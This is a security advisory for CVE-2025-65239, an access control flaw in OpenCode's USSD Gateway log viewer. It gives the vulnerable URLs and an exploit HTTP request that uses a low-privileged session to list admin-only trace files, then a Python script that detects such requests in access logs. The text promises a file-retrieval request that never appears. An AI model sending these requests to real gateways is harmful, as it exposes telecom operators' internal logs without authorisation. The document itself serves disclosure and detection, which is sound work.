[CVE-2025-65239] USSD Gateway Broken Access Control - Logs

Technical information about CVE-2025-65239 in the OpenCode USSD GW application.

Description

Broken access control in the USSD Gateway application offered by OpenCode Systems allows a low-privileged user to enumerate all trace/error log files, which are meant to be accessible only to admin accounts. https://www.cve.org/CVERecord?id=CVE-2025-65239

Application Details

  • Name: USSD Gateway

  • Vendor: OpenCode Systems

  • Version: OC Release 5 - Version 6.13.11

Technical Details

  • Vulnerable Endpoint "All files": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1

  • Vulnerable Endpoint "Specific file": /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log

Exploitation

The vulnerability allows a low-privileged user to list and retrieve the trace and error log files that the LogsViewer is supposed to expose only to admin users: the admin restriction is not enforced on the ListFiles and GetFile functions.

From the low-privileged user's session (the cookies in the request are those of the low-privileged account), send the request below:

GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]

Additionally, a specific file can be retrieved with the GetFile function (the "Specific file" endpoint under Technical Details) using the request below.
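As an added example (not part of the original advisory and not the vendor's code), the following Python detection logic scans web-server access logs for requests to the two LogsViewer functions named above and flags the list-then-fetch pattern per client IP. It assumes Apache/nginx "combined" log format, which the advisory does not specify; the log lines embedded in it are constructed sample data and the trace file names in them are placeholders, not real file names.

```python
"""Detect LogsViewer ListFiles/GetFile requests in web-server access logs.

Assumption: Apache/nginx "combined" log format (not stated in the advisory).
The SAMPLE_LOG lines are constructed sample data; file names are placeholders.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# combined format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Path and function names taken from the advisory's vulnerable endpoints.
VULN_PATH = "/occontrolpanel/index.php"
VULN_FUNCS = {"ListFiles", "GetFile"}

# Constructed sample traffic: one client lists the directory and fetches two files,
# another client gets a 403 on ListFiles and otherwise browses an unrelated page.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2025:09:12:01 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2.0" 200 8421 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2025:09:12:09 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/sample-a.log HTTP/2.0" 200 51200 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2025:09:12:15 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/sample-b.log HTTP/2.0" 200 49873 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2025:09:13:00 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=Dashboard HTTP/2.0" 200 3020 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2025:09:13:30 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2.0" 403 512 "-" "Mozilla/5.0"
"""


def parse_logsviewer_request(target):
    """Return a dict describing a LogsViewer ListFiles/GetFile request, else None.

    op_param has the shape 'SERVER-NAME;<path>[;<count>]' in the advisory, so it is
    split on ';'. parse_qs only splits on '&' (Python >= 3.9.2), so the ';' survives.
    """
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)

    def first(key):
        return q.get(key, [""])[0]

    if first("w") != "ocussdgw" or first("op") != "LogsViewer":
        return None
    func = first("op_func")
    if func not in VULN_FUNCS:
        return None
    fields = first("op_param").split(";")
    return {
        "func": func,
        "server": fields[0] if fields else "",
        "path": fields[1] if len(fields) > 1 else "",
    }


def scan_access_log(lines):
    """One finding per LogsViewer hit: client IP, time, HTTP status, decoded parameters."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        info = parse_logsviewer_request(m["target"])
        if info is None:
            continue
        findings.append({"ip": m["ip"], "time": m["time"],
                         "status": int(m["status"]), **info})
    return findings


def enumeration_candidates(findings, min_getfile=2):
    """Map client IP -> number of successful GetFile reads, for IPs that also got a
    successful ListFiles: the enumerate-then-read pattern the advisory describes."""
    by_ip = defaultdict(list)
    for f in findings:
        by_ip[f["ip"]].append(f)
    flagged = {}
    for ip, hits in by_ip.items():
        listed = any(h["func"] == "ListFiles" and h["status"] == 200 for h in hits)
        fetched = sum(1 for h in hits if h["func"] == "GetFile" and h["status"] == 200)
        if listed and fetched >= min_getfile:
            flagged[ip] = fetched
    return flagged


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["func"]} {h["server"]} {h["path"]}')
    print("enumeration candidates:", enumeration_candidates(hits))
```

The access log does not record the control-panel role of the session, so a flagged IP is a lead, not a verdict: correlate it with the panel's own authentication records (the OCPANEL-SESSIONID cookie seen in the request above is one pivot) to decide whether the requester was an admin. The 403 line in the sample is included only to show that denied requests are excluded from the enumeration candidates.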
